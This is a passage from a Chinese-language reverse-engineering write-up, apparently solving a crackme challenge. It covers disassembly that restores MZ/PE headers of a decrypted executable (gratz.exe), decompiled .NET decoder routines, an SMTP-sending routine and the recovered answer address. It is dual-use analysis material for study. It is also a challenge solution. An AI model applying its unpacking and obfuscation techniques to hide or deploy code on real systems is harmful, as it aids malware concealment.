至此, ***|||||||*之間的程式碼已被解密, 除了 MZ 和 PE 標誌字串以外, 這段記憶體已經是個標準的 PE 檔案了. 下面這段程式碼就是取第一個引數設定 MZ 標誌位, 取第二個引數設定 PE 標誌位:
#!bash
00401B8D . 8B4E 04 mov ecx, dword ptr ds:[esi+0x4]
00401B90 . 0FB611 movzx edx, byte ptr ds:[ecx]
00401B93 . 8815 F8314100 mov byte ptr ds:[0x4131F8], dl
00401B99 . 8B46 04 mov eax, dword ptr ds:[esi+0x4]
00401B9C . 8A48 01 mov cl, byte ptr ds:[eax+0x1]
00401B9F . 880D F9314100 mov byte ptr ds:[0x4131F9], cl
00401BA5 . 8B56 08 mov edx, dword ptr ds:[esi+0x8]
00401BA8 . 8A02 mov al, byte ptr ds:[edx]
00401BAA . A2 78324100 mov byte ptr ds:[0x413278], al
00401BAF . 8B4E 08 mov ecx, dword ptr ds:[esi+0x8]
00401BB2 . 0FB651 01 movzx edx, byte ptr ds:[ecx+0x1]
因此, 這個程式的兩個引數分別為 MZ 和 PE.
再後面就是將解密後的程式寫入檔案 gratz.exe 並執行了.
程式執行介面:
這是個 .Net 程式, 拖到 ILSpy 裡, 可以看到如下程式結構:
其中, lulz.decoder1
, lulz.decoder2
, lulz.decoder3
和 lulz.decoder4
都是將輸入字串的每個字元經過一系列轉換後生成解密後的字元. 解密後發現 lulz.datwork
裡面使用SMTP協議傳送郵件的幾個設定都是錯誤的, 其具體值為:
#!bash
To: [email protected]
Subject: [email protected]
From: [email protected]
SmtpClient: smtp.secureserver.net
另外還發現沒有使用 lulz.decoder4. 後來在 Form1.lulzors 裡面發現有呼叫 lulz.decoder4, 剛好這個函式是介面初始化的函式:
#!c#
// Finisher.Form1
/// <summary>
/// UI initialisation routine of the decrypted .NET program (gratz.exe), as decompiled.
/// Starts <c>lulz.datwork</c> on a separate thread, spin-waits until that thread
/// has exited, then sets <c>label2</c> to the string <c>lulz.decoder4</c> recovers
/// from an obfuscated literal.
/// </summary>
public void lulzors()
{
lulz lulz = new lulz();
// datwork is the routine the text above describes as the (misconfigured) SMTP sender.
Thread thread = new Thread(new ThreadStart(lulz.datwork));
thread.Start();
// Busy-wait instead of Join(): spins a core until datwork returns. Kept as decompiled.
while (thread.IsAlive)
{
}
// The decoded text is what the writeup treats as the final answer; the literal is
// the obfuscated input, not the address itself.
this.label2.Text = lulz.decoder4("\v\fP\u000e\u000fBA\u0006\rG\u0015I\u001a\u0001\u0016H\\\t\b\u0002\u0013/\b\t^\u001d\bJO\a]C\u001b\u0005");
}
這個 Form1.label2
應該就是程式介面下方空白的那一部分吧, 把呼叫 lulz.decoder4
這一行單獨拿出來執行, 其結果為:
[email protected]
這個就是最終正確的郵箱地址了.
當然也可以修改程式, 讓程式直接輸出郵箱地址:
參考連結:
- 【原創】虛擬機器檢測技術剖析
- 加密與解密(第三版)
- 利用pdf的js函式漏洞構造堆噴射的攻擊思路
- 找到shellcode